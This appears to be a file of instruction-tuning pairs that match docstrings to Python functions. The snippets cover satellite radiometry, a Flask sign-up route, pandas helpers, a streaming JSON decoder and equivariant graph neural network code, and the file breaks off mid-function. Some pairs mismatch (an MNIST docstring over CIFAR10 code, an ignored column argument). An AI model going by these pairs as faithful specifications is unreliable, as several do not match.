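+The job tuples produced by generate_jobs above are typically fanned out across processes; a sketch under the assumption that the configured SixS instances pickle cleanly (verify for your Py6S version).
+ from multiprocessing import Pool
+
+ def run_all_jobs(jobs, nprocs=4):
+     with Pool(nprocs) as pool:
+         results = pool.map(run_sixs_job, jobs)
+     # each entry is (xdict, adjcorr_params, passed_through_args)
+     return results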
[/INST] def run_sixs_job(args): + mysixs = args[0] + moreargs = args[1:] + mysixs.run() + xdict = { + 'xa': mysixs.outputs.coef_xa, + 'xb': mysixs.outputs.coef_xb, + 'xc': mysixs.outputs.coef_xc} + adjcorr_params = [ + mysixs.geometry.view_z, + mysixs.outputs.optical_depth_total.total, + mysixs.outputs.transmittance_global_gas.upward, + mysixs.outputs.transmittance_total_scattering.upward] + return (xdict, adjcorr_params, moreargs) +[INST] Compute TOA radiance from DigitalGlobe digital numbers +Parameters + +dndata : ndarray shape (nbands, ny, nx) +digital numbers data +mtdFile : str +path to IMD metadata file +band_ids : sequence of int +band IDs. [/INST] def dn_to_radiance(dndata, mtdFile, band_ids): + radata = radiance.dn_to_radiance(dndata, mtdFile, band_ids=band_ids) + with np.errstate(invalid='ignore'): + radata[radata < 0] = 0 + return radata +[INST] Creates a new user and logs them in. [/INST] def sign_up(): + form = SignUpForm() + form['csrf_token'].data = request.cookies['csrf_token'] + err = '' + data = request.get_json() + if data['password'] != data['confirm_password']: + err='Password and confirm password must match.' + if form.validate_on_submit(): + if err == '': + user = User( + username=form.data['username'], + email=form.data['email'], + firstName=form.data['firstName'], + lastName=form.data['lastName'], + password=form.data['password'], + profileImg=form.data['profileImg'] + ) + db.session.add(user) + db.session.commit() + login_user(user) + return user.to_dict() + errors = validation_errors_to_error_messages(form.errors) + error_msgs = [txt.split(': ')[1] + for txt in validation_errors_to_error_messages(form.errors)] + if err: + error_msgs.append(err) + return {'errors': error_msgs}, 401 +[INST] Return length of string (number of word, seperated by Space).. [/INST] def string_len_w(string): + string_str = str(string) + string_list = string_str.split() + string_len = len(string_list) + return string_len +[INST] Making a list based on entry in one category and if missing adds entry of another Column. [/INST] def helper_list(): + empty = [] + for i in range(df.shape[0]): + if df["category_parent_id"][i] != 0: + empty.append(df["category_parent_id"][i]) + else: + empty.append(df["category_id"][i]) + return empty +[INST] based on key value in a column, column with value is added as a column and updated dataframe is returned.. [/INST] def add_parent_name(df, column_name1, column_name2, dictionary): + df[column_name1] = df[column_name2].apply(lambda x: dictionary.get(x)) + return df +[INST] Calculating difference between two timepoints and returns it in days. [/INST] def duration(deadline, launched_at): + duration = deadline - launched_at + duration_complete = dt.timedelta(seconds=duration) + return duration_complete.days +[INST] Converts a Column based on given exchange rate, rounds it to two decimal spaces +and returns updated dataframe, e.g.. [/INST] def usd_convert_goal(df, column_name, exchange_rate): + df[column_name] = (df[column_name] * df[exchange_rate]).round(2) + return df +[INST] Creating dataframe and dropping all duplicates, based on a column_name +and keep the last ("newest") duplicate. [/INST] def drop_duplicates(df, column_name): + df = df.drop_duplicates(subset=['id'], keep='last') + return df +[INST] Only create new csv if not already done. 
[/INST] def read_files(): + if not Path("./data/Kickstarter_merged.csv").exists(): + all_files = glob.glob(os.path.join(path, "Kickstarter*.csv")) + df_from_each_file = (pd.read_csv(f, sep=',') for f in all_files) + df_merged = pd.concat(df_from_each_file, ignore_index=True) + df_merged.to_csv('./data/Kickstarter_merged.csv') + return pd.read_csv('./data/Kickstarter_merged.csv', index_col=0) +[INST] Almost identical to ``json.load``, except that it produces and iterator. +Which returns zero or more objects that can be decoded by JSON documents +separated by whitespace, or the given string or regex. + +``separator`` defaults to zero or more whitespace characters. You can +provide a different, but fixed width, separator if desired. + + + + + +``max_bufsize`` limit the size of the buffer used to hold unparsed +parts of the document. Must be at least as large as the largest document +in the stream, or a JSONDecodeError will be raised.. [/INST] def load( + fp, *, cls=None, object_hook=None, parse_float=None, + parse_int=None, parse_constant=None, object_pairs_hook=None, + separator=None, + bufsize=1048576, + max_bufsize=float('inf'), + stream_offset=0, + **kw +): + if not hasattr(fp, 'encoding'): + fp = io.TextIOWrapper(fp, encoding='utf8') + cls, kw = _parse_kw( + cls, object_hook, parse_float, parse_int, parse_constant, object_pairs_hook, kw + ) + next_pos, pos = get_first_pos_and_next_pos_func(separator) + return iter(DecodeStream( + fp, + cls(**kw), + next_pos, + pos, + kw.get('parse_int'), + kw.get('parse_float'), + bufsize, + max_bufsize, + stream_offset, + )) +[INST] Almost identical to ``json.loads``, except that it produces and iterator. +Which returns zero or more objects that are decoded from JSON documents +separated by whitespace, or the given string or regex. + +Always decodes bytes and bytearrays as UTF-8. Manually decode if this is +not desired. + + + +``separator`` defaults to zero or more whitespace characters. You can +provide a different, but fixed width, separator if desired.. [/INST] def loads( + s, *, cls=None, object_hook=None, parse_float=None, + parse_int=None, parse_constant=None, object_pairs_hook=None, + pos=0, + separator=None, + **kw +): + if isinstance(s, str): + if s.startswith('\ufeff'): + raise JSONDecodeError("Unexpected UTF-8 BOM (decode using utf-8-sig)", + s, 0) + else: + if not isinstance(s, (bytes, bytearray)): + raise TypeError(f'the JSON object must be str, bytes or bytearray, ' + f'not {s.__class__.__name__}') + s = s.decode('utf8') + cls, kw = _parse_kw( + cls, object_hook, parse_float, parse_int, parse_constant, object_pairs_hook, kw + ) + next_pos, pos = get_first_pos_and_next_pos_func(separator) + return decode_stacked(s, cls(**kw), next_pos, pos) +[INST] Read enough data from the stream until: +the start of the next object is found (return true) +the delimiter check fails (raise an error) +the stream is empty (return false). [/INST] def next_pos(self): + while True: + new_pos = self.next_pos_helper(self.partial_doc, self.pos) + if new_pos is None: + if self._try_read(''): + continue + return False + else: + self.pos = new_pos + return True +[INST] Reads new data, and adds to any unparsed data. +Returns true if new data was read. 
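+This buffering is what lets the loads()/load() iterators described earlier yield one document at a time; for context, a hypothetical usage (the package import path is not shown in this snippet):
+ docs = list(loads('{"a": 1} {"b": 2}\n[3, 4]'))
+ # docs == [{'a': 1}, {'b': 2}, [3, 4]]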
[/INST] def _try_read(self, remaining_buffer): + if len(remaining_buffer) + self.bufsize > self.max_bufsize: + to_read = self.max_bufsize - len(remaining_buffer) + if to_read <= 0: + raise ValueError('max buffer size exceeded') + else: + to_read = self.bufsize + new = self.stream.read(to_read) + self.stream_offset += len(self.partial_doc) - len(remaining_buffer) + self.partial_doc = remaining_buffer + new + self.pos = 0 + return bool(new) +[INST] Trains a model on MNIST and evaluates its performance on MNIST, Flip-MNIST and 90Rot-MNIST.. [/INST] def train(config=None): + with wandb.init(config=config, project="cheblienet"): + config = wandb.config + wandb.log({"dataset": "cifar10"}) + wandb.log(vars(args)) + device = torch.device("cuda" if torch.cuda.is_available() and args.cuda else "cpu") + if args.pool: + if args.anisotropic: + graph_lvl0 = SE2GEGraph( + [8, 8, config.ntheta], + K=config.K, + sigmas=(1.0, config.eps, config.xi_0), + path_to_graph=args.path_to_graph, + ) + graph_lvl1 = SE2GEGraph( + [16, 16, config.ntheta], + K=config.K, + sigmas=(1.0, config.eps, config.xi_1), + path_to_graph=args.path_to_graph, + ) + else: + graph_lvl0 = R2GEGraph( + [8, 8, 1], + K=config.K, + sigmas=(1.0, config.eps, config.xi_0), + path_to_graph=args.path_to_graph, + ) + graph_lvl1 = R2GEGraph( + [16, 16, 1], + K=config.K, + sigmas=(1.0, config.eps, config.xi_1), + path_to_graph=args.path_to_graph, + ) + if args.anisotropic: + graph_lvl2 = SE2GEGraph( + [32, 32, config.ntheta], + K=config.K, + sigmas=(1.0, config.eps, config.xi_2), + path_to_graph=args.path_to_graph, + ) + else: + graph_lvl2 = R2GEGraph( + [32, 32, 1], + K=config.K, + sigmas=(1.0, config.eps, config.xi_2), + path_to_graph=args.path_to_graph, + ) + model = WideResSE2GEChebNet( + in_channels=3, + out_channels=10, + kernel_size=config.kernel_size, + graph_lvl0=graph_lvl0 if args.pool else graph_lvl2, + graph_lvl1=graph_lvl1 if args.pool else None, + graph_lvl2=graph_lvl2 if args.pool else None, + res_depth=args.res_depth, + widen_factor=args.widen_factor, + reduction=args.reduction if args.pool else None, + ).to(device) + wandb.log({"capacity": capacity(model)}) + optimizer = Adam(model.parameters(), lr=args.lr) + train_loader, _ = get_train_val_loaders( + "cifar10", + num_layers=config.ntheta, + batch_size=args.batch_size, + val_ratio=0.0, + path_to_data=args.path_to_data, + ) + (classic_test_loader, rotated_test_loader, flipped_test_loader,) = get_equiv_test_loaders( + "cifar10", num_layers=config.ntheta, batch_size=args.batch_size, path_to_data=args.path_to_data + ) + trainer = create_supervised_trainer( + graph=graph_lvl2, + model=model, + optimizer=optimizer, + loss_fn=nll_loss, + device=device, + prepare_batch=prepare_batch, + ) + ProgressBar(persist=False, desc="Training").attach(trainer) + classic_metrics = {"classic_test_accuracy": Accuracy(), "classic_test_loss": Loss(nll_loss)} + rotated_metrics = {"rotated_test_accuracy": Accuracy(), "rotated_test_loss": Loss(nll_loss)} + flipped_metrics = {"flipped_test_accuracy": Accuracy(), "flipped_test_loss": Loss(nll_loss)} + classic_evaluator = create_supervised_evaluator( + graph=graph_lvl2, + model=model, + metrics=classic_metrics, + device=device, + prepare_batch=prepare_batch, + ) + ProgressBar(persist=False, desc="Evaluation").attach(classic_evaluator) + rotated_evaluator = create_supervised_evaluator( + graph=graph_lvl2, + model=model, + metrics=rotated_metrics, + device=device, + prepare_batch=prepare_batch, + ) + ProgressBar(persist=False, 
desc="Evaluation").attach(rotated_evaluator) + flipped_evaluator = create_supervised_evaluator( + graph=graph_lvl2, + model=model, + metrics=flipped_metrics, + device=device, + prepare_batch=prepare_batch, + ) + ProgressBar(persist=False, desc="Evaluation").attach(flipped_evaluator) + trainer.add_event_handler(Events.EPOCH_COMPLETED, wandb_log, classic_evaluator, classic_test_loader) + trainer.add_event_handler(Events.EPOCH_COMPLETED, wandb_log, rotated_evaluator, rotated_test_loader) + trainer.add_event_handler(Events.EPOCH_COMPLETED, wandb_log, flipped_evaluator, flipped_test_loader) + trainer.run(train_loader, max_epochs=args.max_epochs) +[INST] Extra representation of the Chebyschev convolutional layer.. [/INST] def extra_repr(self): + s = "in_channels={in_channels}, out_channels={out_channels}, kernel_size={kernel_size}" + if self.bias is None: + s += ", bias=False" + else: + s += ", bias=True" + return s.format(**self.__dict__) +[INST] Returns a new tensor corresponding to matrix formulation of the given input tensors representing +SO(3) group elements.. [/INST] def so3_matrix(alpha, beta, gamma, device=None): + R_alpha_z = rotation_matrix(alpha, "z", device) + R_beta_y = rotation_matrix(beta, "y", device) + R_gamma_z = rotation_matrix(gamma, "z", device) + return R_gamma_z @ R_beta_y @ R_alpha_z +[INST] Returns a new tensor corresponding to the inverse of the group elements in matrix formulation.. [/INST] def s2_inverse(G): + return torch.transpose(G, -1, -2) +[INST] Returns a new tensor corresponding to the inverse of the group elements in matrix formulation.. [/INST] def so3_inverse(G): + return torch.transpose(G, -1, -2) +[INST] Return new tensors corresponding to alpha, beta and gamma attributes of the group elements specified by the +S2 group elements in matrix formulation.. [/INST] def s2_element(G): + gamma = torch.atan2(G[..., 1, 0], G[..., 0, 0]) + beta = torch.acos(G[..., 2, 2]) + return beta, gamma +[INST] Return new tensors corresponding to alpha, beta and gamma attributes of the group elements specified by the +so3 group elements in matrix formulation.. [/INST] def so3_element(G): + gamma = torch.atan2(G[..., 1, 2], G[..., 0, 2]) + sin = torch.sin(gamma) + cos = torch.cos(gamma) + beta = torch.atan2(cos * G[..., 0, 2] + sin * G[..., 1, 2], G[..., 2, 2]) + alpha = torch.atan2(-sin * G[..., 0, 0] + cos * G[..., 1, 0], -sin * G[..., 0, 1] + cos * G[..., 1, 1]) + return alpha, beta, gamma +[INST] Returns a new tensor containing the riemannnian logarithm of the group elements in matrix formulation.. [/INST] def s2_log(G): + beta, gamma = s2_element(G) + G = so3_matrix(-gamma, beta, gamma) + theta = torch.acos(((G[..., 0, 0] + G[..., 1, 1] + G[..., 2, 2]) - 1) / 2) + c1 = 0.5 * theta / torch.sin(theta) * (G[..., 2, 1] - G[..., 1, 2]) + c2 = 0.5 * theta / torch.sin(theta) * (G[..., 0, 2] - G[..., 2, 0]) + c3 = torch.zeros_like(c1) + mask = theta == 0.0 + c1[mask] = 0.5 * G[mask, 2, 1] - G[mask, 1, 2] + c2[mask] = 0.5 * G[mask, 0, 2] - G[mask, 2, 0] + mask = theta == math.pi + c1[mask] = math.pi + c2[mask] = 0.0 + c = torch.stack((c1, c2, c3), dim=-1).unsqueeze(2) + return c +[INST] Returns a new tensor containing the riemannnian logarithm of the group elements in matrix formulation.. 
[/INST] def so3_log(G): + theta = torch.acos(((G[..., 0, 0] + G[..., 1, 1] + G[..., 2, 2]) - 1) / 2) + c1 = 0.5 * theta / torch.sin(theta) * (G[..., 2, 1] - G[..., 1, 2]) + c2 = 0.5 * theta / torch.sin(theta) * (G[..., 0, 2] - G[..., 2, 0]) + c3 = 0.5 * theta / torch.sin(theta) * (G[..., 1, 0] - G[..., 0, 1]) + mask = theta == 0.0 + c1[mask] = 0.5 * G[mask, 2, 1] - G[mask, 1, 2] + c2[mask] = 0.5 * G[mask, 0, 2] - G[mask, 2, 0] + c3[mask] = 0.5 * G[mask, 1, 0] - G[mask, 0, 1] + mask = theta == math.pi + c1[mask] = math.pi + c2[mask] = 0.0 + c3[mask] = 0.0 + c = torch.stack((c1, c2, c3), dim=-1).unsqueeze(2) + return c +[INST] Return the squared riemannian distances between group elements in matrix formulation.. [/INST] def s2_riemannian_sqdist(Gg, Gh, Re): + G = torch.matmul(s2_inverse(Gg), Gh) + return weighted_norm(s2_log(G), Re) +[INST] Returns the squared riemannian distances between group elements in matrix formulation.. [/INST] def so3_riemannian_sqdist(Gg, Gh, Re): + G = torch.matmul(so3_inverse(Gg), Gh) + alpha, beta, gamma = so3_element(G) + sqdist1 = weighted_norm(so3_log(so3_matrix(alpha, beta, gamma)), Re) + sqdist2 = weighted_norm(so3_log(so3_matrix(alpha - math.pi, beta, gamma)), Re) + sqdist3 = weighted_norm(so3_log(so3_matrix(alpha + math.pi, beta, gamma)), Re) + sqdist, _ = torch.stack((sqdist1, sqdist2, sqdist3)).min(dim=0) + return sqdist +[INST] Make the graph undirected, that is create an inverse edge for each edge.. [/INST] def to_undirected(edge_index, edge_sqdist, edge_weight=None, num_vertices=None, max_sqdist=None, self_loop=False): + num_vertices = num_vertices or edge_index.max() + 1 + sqdist_matrix = torch.sparse.FloatTensor(edge_index, edge_sqdist, torch.Size((num_vertices, num_vertices))).to_dense() + mask = sqdist_matrix.t() == sqdist_matrix + if max_sqdist is not None: + mask &= sqdist_matrix <= max_sqdist + undirected_sqdist_matrix = torch.zeros_like(sqdist_matrix) + undirected_sqdist_matrix[mask] = sqdist_matrix[mask] + undirected_sqdist_matrix = undirected_sqdist_matrix.to_sparse() + if edge_weight is not None: + weight_matrix = torch.sparse.FloatTensor(edge_index, edge_weight, torch.Size((num_vertices, num_vertices))).to_dense() + undirected_weight_matrix = torch.zeros_like(weight_matrix) + undirected_weight_matrix[mask] = weight_matrix[mask] + undirected_weight_matrix = undirected_weight_matrix.to_sparse() + edge_index = undirected_sqdist_matrix.indices() + edge_sqdist = undirected_sqdist_matrix.values() + if edge_weight is not None: + edge_weight = undirected_weight_matrix.values() + if self_loop: + if edge_weight is None: + return edge_index, edge_sqdist + return edge_index, edge_sqdist, edge_weight + return remove_self_loops(edge_index, edge_sqdist, edge_weight) +[INST] Removes all self-loop in the graph.. [/INST] def remove_self_loops(edge_index, edge_sqdist, edge_weight=None): + mask = edge_index[0] != edge_index[1] + if edge_weight is None: + return edge_index[..., mask], edge_sqdist[mask] + return edge_index[..., mask], edge_sqdist[mask], edge_weight[mask] +[INST] Add a self-loop for each vertex of the graph.. 
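+A tiny worked example of the helper defined below; the self-loop edges are prepended with the given weight.
+ import torch
+
+ edge_index = torch.tensor([[0, 1], [1, 0]])
+ edge_attr = torch.tensor([0.5, 0.5])
+ new_index, new_attr = add_self_loops(edge_index, edge_attr, weight=1.0)
+ # new_index -> tensor([[0, 1, 0, 1],
+ #                      [0, 1, 1, 0]])
+ # new_attr  -> tensor([1.0000, 1.0000, 0.5000, 0.5000])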
[/INST] def add_self_loops(edge_index, edge_attr, weight=1.0): + self_loop_index = edge_index[0].unique().unsqueeze(0).repeat(2, 1) + self_loop_attr = weight * torch.ones(self_loop_index.shape[1]) + edge_index = torch.cat((self_loop_index, edge_index), dim=1) + edge_attr = torch.cat((self_loop_attr, edge_attr)) + return edge_index, edge_attr +[INST] U-net-like model training on ClimateNet for the segmentation of extreme meteorogolical events.. [/INST] def train(config=None): + with wandb.init(config=config, project="cheblienet"): + config = wandb.config + wandb.log({"dataset": "artc"}) + wandb.log(vars(args)) + device = torch.device("cuda" if torch.cuda.is_available() and args.cuda else "cpu") + if args.anisotropic: + graph_lvl0 = SO3GEGraph( + size=[12, config.nalpha], + sigmas=(1.0, config.eps, config.xi_0), + K=config.K, + path_to_graph=args.path_to_graph, + ) + graph_lvl1 = SO3GEGraph( + size=[42, config.nalpha], + sigmas=(1.0, config.eps, config.xi_1), + K=config.K, + path_to_graph=args.path_to_graph, + ) + graph_lvl2 = SO3GEGraph( + size=[162, config.nalpha], + sigmas=(1.0, config.eps, config.xi_2), + K=config.K, + path_to_graph=args.path_to_graph, + ) + graph_lvl3 = SO3GEGraph( + size=[642, config.nalpha], + sigmas=(1.0, config.eps, config.xi_3), + K=config.K, + path_to_graph=args.path_to_graph, + ) + graph_lvl4 = SO3GEGraph( + size=[2562, config.nalpha], + sigmas=(1.0, config.eps, config.xi_4), + K=config.K, + path_to_graph=args.path_to_graph, + ) + graph_lvl5 = SO3GEGraph( + size=[10242, config.nalpha], + sigmas=(1.0, config.eps, config.xi_5), + K=config.K, + path_to_graph=args.path_to_graph, + ) + else: + graph_lvl0 = S2GEGraph( + size=[12, config.nalpha], + sigmas=(1.0, config.eps, config.xi_0), + K=config.K, + path_to_graph=args.path_to_graph, + ) + graph_lvl1 = S2GEGraph( + size=[42, config.nalpha], + sigmas=(1.0, config.eps, config.xi_1), + K=config.K, + path_to_graph=args.path_to_graph, + ) + graph_lvl2 = S2GEGraph( + size=[162, config.nalpha], + sigmas=(1.0, config.eps, config.xi_2), + K=config.K, + path_to_graph=args.path_to_graph, + ) + graph_lvl3 = S2GEGraph( + size=[642, config.nalpha], + sigmas=(1.0, config.eps, config.xi_3), + K=config.K, + path_to_graph=args.path_to_graph, + ) + graph_lvl4 = S2GEGraph( + size=[2562, config.nalpha], + sigmas=(1.0, config.eps, config.xi_4), + K=config.K, + path_to_graph=args.path_to_graph, + ) + graph_lvl5 = S2GEGraph( + size=[10242, config.nalpha], + sigmas=(1.0, config.eps, config.xi_5), + K=config.K, + path_to_graph=args.path_to_graph, + ) + output_graph = S2GEGraph( + size=[10242, 1], + sigmas=(1.0, 1.0, 1.0), + K=config.K, + path_to_graph=args.path_to_graph, + ) + model = SO3GEUChebNet( + 16, + 3, + config.kernel_size, + graph_lvl0, + graph_lvl1, + graph_lvl2, + graph_lvl3, + graph_lvl4, + graph_lvl5, + output_graph, + args.reduction, + args.expansion, + ).to(device) + wandb.log({"capacity": capacity(model)}) + optimizer = Adam(model.parameters(), lr=args.lr) + train_loader, _ = get_train_val_loaders( + "artc", + batch_size=args.batch_size, + num_layers=config.nalpha, + val_ratio=0.0, + path_to_data=args.path_to_data, + ) + test_loader = get_test_loader( + "artc", batch_size=args.batch_size, num_layers=config.nalpha, path_to_data=args.path_to_data + ) + trainer = create_supervised_trainer( + graph=graph_lvl5, + model=model, + optimizer=optimizer, + loss_fn=nll_loss, + device=device, + prepare_batch=prepare_batch, + ) + ProgressBar(persist=False, desc="Training").attach(trainer) + cm = ConfusionMatrix(num_classes=3) + miou = 
mIoU(cm) + miou_wo_bg = mIoU(cm, ignore_index=0) + f1 = Fbeta(1, precision=Precision(average=False), recall=Recall(average=False)) + acc_bg = PerClassAccuracy(0) + acc_ar = PerClassAccuracy(1) + acc_tc = PerClassAccuracy(2) + mean_average_precision = AveragePrecision(output_transform=output_transform_mAP) + loss = Loss(nll_loss) + metrics = { + "test_F1": f1, + "test_mIoU": miou, + "test_mIoU_bg": miou_wo_bg, + "test_loss": loss, + "test_acc_bg": acc_bg, + "test_acc_ar": acc_ar, + "test_acc_tc": acc_tc, + "test_mAP": mean_average_precision, + } + evaluator = create_supervised_evaluator( + graph=graph_lvl5, + model=model, + metrics=metrics, + device=device, + prepare_batch=prepare_batch, + ) + ProgressBar(persist=False, desc="Evaluation").attach(evaluator) + _ = trainer.add_event_handler(Events.EPOCH_COMPLETED, wandb_log, evaluator, test_loader) + trainer.run(train_loader, max_epochs=args.max_epochs) +[INST] Gets the training configuration for Bayesian hyper-parameter optimization.. [/INST] def build_sweep_config() -> dict: + sweep_config = { + "method": "bayes", + "metric": {"name": "validation_accuracy", "goal": "maximize"}, + } + parameters = { + "batch_size": {"distribution": "categorical", "values": [8, 16, 32]}, + "kernel_size": {"distribution": "categorical", "values": [2, 3, 4, 5, 6]}, + "K": {"distribution": "categorical", "values": [8, 16, 32]}, + "xi": {"distribution": "log_uniform", "min": math.log(1e-4), "max": math.log(1e-1)}, + "ntheta": {"distribution": "int_uniform", "min": 2, "max": 9}, + "eps": {"distribution": "log_uniform", "min": math.log(1e-2), "max": math.log(1)}, + } + sweep_config["parameters"] = parameters + return sweep_config +[INST] Bayesian hyper-parameter optimization on CIFAR10.. [/INST] def train(config=None): + with wandb.init(config=config): + config = wandb.config + wandb.log({"dataset": "cifar10"}) + wandb.log(vars(args)) + device = torch.device("cuda" if torch.cuda.is_available() and args.cuda else "cpu") + graph_lvl0 = SE2GEGraph( + [8, 8, config.ntheta], + K=config.K, + sigmas=(1.0, config.eps, config.xi * 16), + path_to_graph=args.path_to_graph, + ) + graph_lvl1 = SE2GEGraph( + [16, 16, config.ntheta], + K=config.K, + sigmas=(1.0, config.eps, config.xi * 4), + path_to_graph=args.path_to_graph, + ) + graph_lvl2 = SE2GEGraph( + [32, 32, config.ntheta], + K=config.K, + sigmas=(1.0, config.eps, config.xi), + path_to_graph=args.path_to_graph, + ) + model = WideResSE2GEChebNet( + in_channels=3, + out_channels=10, + kernel_size=config.kernel_size, + graph_lvl0=graph_lvl0, + graph_lvl1=graph_lvl1, + graph_lvl2=graph_lvl2, + res_depth=args.res_depth, + widen_factor=args.widen_factor, + reduction=args.reduction if args.pool else None, + ).to(device) + wandb.log({"capacity": capacity(model)}) + optimizer = Adam(model.parameters(), lr=args.lr) + train_loader, val_loader = get_train_val_loaders( + "cifar10", + batch_size=config.batch_size, + val_ratio=0.3, + path_to_data=args.path_to_data, + ) + trainer = create_supervised_trainer( + graph=graph_lvl2, + model=model, + optimizer=optimizer, + loss_fn=nll_loss, + device=device, + prepare_batch=prepare_batch, + ) + ProgressBar(persist=False, desc="Training").attach(trainer) + metrics = {"validation_accuracy": Accuracy(), "validation_loss": Loss(nll_loss)} + evaluator = create_supervised_evaluator( + graph=graph_lvl2, + model=model, + metrics=metrics, + device=device, + prepare_batch=prepare_batch, + ) + ProgressBar(persist=False, desc="Evaluation").attach(evaluator) + trainer.add_event_handler(Events.EPOCH_COMPLETED, 
wandb_log, evaluator, val_loader) + trainer.run(train_loader, max_epochs=args.max_epochs) +[INST] Trains a model on STL10 and evaluates its performance on STL10, Flip-STL10 and 90Rot-STL10.. [/INST] def train(config=None): + with wandb.init(config=config, project="cheblienet"): + config = wandb.config + wandb.log({"dataset": "stl10"}) + wandb.log(vars(args)) + device = torch.device("cuda" if torch.cuda.is_available() and args.cuda else "cpu") + if args.anisotropic: + graph_lvl0 = SE2GEGraph( + [24, 24, config.ntheta], + K=config.K, + sigmas=(1.0, config.eps, config.xi_0), + path_to_graph=args.path_to_graph, + ) + graph_lvl1 = SE2GEGraph( + [48, 48, config.ntheta], + K=config.K, + sigmas=(1.0, config.eps, config.xi_1), + path_to_graph=args.path_to_graph, + ) + graph_lvl2 = SE2GEGraph( + [96, 96, config.ntheta], + K=config.K, + sigmas=(1.0, config.eps, config.xi_2), + path_to_graph=args.path_to_graph, + ) + else: + graph_lvl0 = R2GEGraph( + [24, 24, 1], + K=config.K, + sigmas=(1.0, config.eps, config.xi_0), + path_to_graph=args.path_to_graph, + ) + graph_lvl1 = R2GEGraph( + [48, 48, 1], + K=config.K, + sigmas=(1.0, config.eps, config.xi_1), + path_to_graph=args.path_to_graph, + ) + graph_lvl2 = R2GEGraph( + [96, 96, 1], + K=config.K, + sigmas=(1.0, config.eps, config.xi_2), + path_to_graph=args.path_to_graph, + ) + model = WideResSE2GEChebNet( + in_channels=3, + out_channels=10, + kernel_size=config.kernel_size, + graph_lvl0=graph_lvl0, + graph_lvl1=graph_lvl1, + graph_lvl2=graph_lvl2, + res_depth=args.res_depth, + widen_factor=args.widen_factor, + reduction=args.reduction, + ).to(device) + wandb.log({"capacity": capacity(model)}) + optimizer = Adam(model.parameters(), lr=args.lr) + train_loader, _ = get_train_val_loaders( + "stl10", + batch_size=args.batch_size, + val_ratio=0.0, + num_layers=config.ntheta, + path_to_data=args.path_to_data, + ) + test_loader = get_test_loader( + "stl10", batch_size=args.batch_size, num_layers=config.ntheta, path_to_data=args.path_to_data + ) + trainer = create_supervised_trainer( + graph=graph_lvl2, + model=model, + optimizer=optimizer, + loss_fn=nll_loss, + device=device, + prepare_batch=prepare_batch, + ) + ProgressBar(persist=False, desc="Training").attach(trainer) + metrics = {"test_accuracy": Accuracy(), "test_loss": Loss(nll_loss)} + evaluator = create_supervised_evaluator( + graph=graph_lvl2, + model=model, + metrics=metrics, + device=device, + prepare_batch=prepare_batch, + ) + ProgressBar(persist=False, desc="Evaluation").attach(evaluator) + trainer.add_event_handler(Events.EPOCH_COMPLETED, wandb_log, evaluator, test_loader) + trainer.run(train_loader, max_epochs=args.max_epochs) +[INST] Factory function for creating a trainer for supervised models.. [/INST] def create_supervised_trainer( + graph, + model, + optimizer, + loss_fn, + device=None, + prepare_batch=None, + output_transform=None, +): + device = device or torch.device("cpu") + prepare_batch = prepare_batch if prepare_batch is not None else lambda x, y: (x, y) + output_transform = output_transform if output_transform is not None else lambda x, y, y_pred, loss: loss.item() + def _update(engine, batch): + model.train() + optimizer.zero_grad() + x, y = prepare_batch(batch, graph, device) + y_pred = model(x) + loss = loss_fn(y_pred, y) + loss.backward() + optimizer.step() + return output_transform(x, y, y_pred, loss) + trainer = Engine(_update) + return trainer +[INST] Factory function for creating an evaluator for supervised models.. 
[/INST] def create_supervised_evaluator(graph, model, metrics=None, device=None, prepare_batch=None, output_transform=None): + metrics = metrics or {} + device = device or torch.device("cpu") + prepare_batch = prepare_batch if prepare_batch is not None else lambda x, y: (x, y) + output_transform = output_transform if output_transform is not None else lambda x, y, y_pred: (y_pred, y) + def _inference(engine, batch): + model.eval() + with torch.no_grad(): + x, y = prepare_batch(batch, graph, device) + y_pred = model(x) + return output_transform(x, y, y_pred) + evaluator = Engine(_inference) + for name, metric in metrics.items(): + metric.attach(evaluator, name) + return evaluator +[INST] Download the dataset if it doesn't already exist.. [/INST] def download(self): + if not self.check_exists(): + download_and_extract_archive(self.resource, download_root=os.path.split(self.path_to_data)[0]) + else: + print("Data already exists") +[INST] Check if dataset already exists.. [/INST] def check_exists(self): + return os.path.exists(self.path_to_data) +[INST] Return a new tensor filled with rotation matrices.. [/INST] def rotation_matrix(angle, axis, device=None): + R = torch.zeros(angle.nelement(), 3, 3, device=device) + cos = torch.cos(angle) + sin = torch.sin(angle) + if axis == "x": + R[..., 0, 0] = 1.0 + R[..., 1, 1] = cos + R[..., 1, 2] = -sin + R[..., 2, 1] = sin + R[..., 2, 2] = cos + if axis == "y": + R[..., 0, 0] = cos + R[..., 0, 2] = sin + R[..., 2, 0] = -sin + R[..., 2, 2] = cos + R[..., 1, 1] = 1.0 + if axis == "z": + R[..., 0, 0] = cos + R[..., 0, 1] = -sin + R[..., 1, 0] = sin + R[..., 1, 1] = cos + R[..., 2, 2] = 1.0 + return R +[INST] Return new tensors corresponding to the angle representation from the cartesian representation. +Warning: x, y, z have to be on the unit sphere.. [/INST] def xyz2betagamma(x, y, z): + beta = torch.acos(z) + gamma = torch.atan2(y, x) + return beta, gamma +[INST] Returns new tensors corresponding to the cartesian representation from the angle representation.. [/INST] def betagamma2xyz(beta, gamma, axis=None): + if axis == "x": + return torch.sin(beta) * torch.cos(gamma) + if axis == "y": + return torch.sin(beta) * torch.sin(gamma) + if axis == "z": + return torch.cos(beta) + x = torch.sin(beta) * torch.cos(gamma) + y = torch.sin(beta) * torch.sin(gamma) + z = torch.cos(beta) + return x, y, z +[INST] Check if input is a numpy object.. [/INST] def _is_numpy(input): + return isinstance(input, np.ndarray) +[INST] Convert a ``PIL Image`` to a tensor of the same type. +This function does not support torchscript.. [/INST] def pil_to_tensor(input): + if not _is_pil_image(input): + raise TypeError("input should be PIL Image. 
Got {}".format(type(input))) + default_float_dtype = torch.get_default_dtype() + if input.mode == "I": + output = torch.from_numpy(np.array(input, np.int32, copy=False)) + elif input.mode == "I;16": + output = torch.from_numpy(np.array(input, np.int16, copy=False)) + elif input.mode == "F": + output = torch.from_numpy(np.array(input, np.float32, copy=False)) + elif input.mode == "1": + output = 255 * torch.from_numpy(np.array(input, np.uint8, copy=False)) + else: + output = torch.ByteTensor(torch.ByteStorage.from_buffer(input.tobytes())) + output = output.view(input.size[1], input.size[0], len(input.getbands())) + output = output.permute((2, 0, 1)).contiguous() + if isinstance(output, torch.ByteTensor): + return output.to(dtype=default_float_dtype).div(255) + else: + return output +[INST] Return the diffusion kernel of the graph specified by the kernel input.. [/INST] def diff_kernel(self, kernel): + lambdas, Phi = self.get_eigen_space() + return Phi @ np.diag(kernel(lambdas)) @ Phi.T +[INST] Return the total number of vertices of the graph.. [/INST] def num_vertices(self): + return 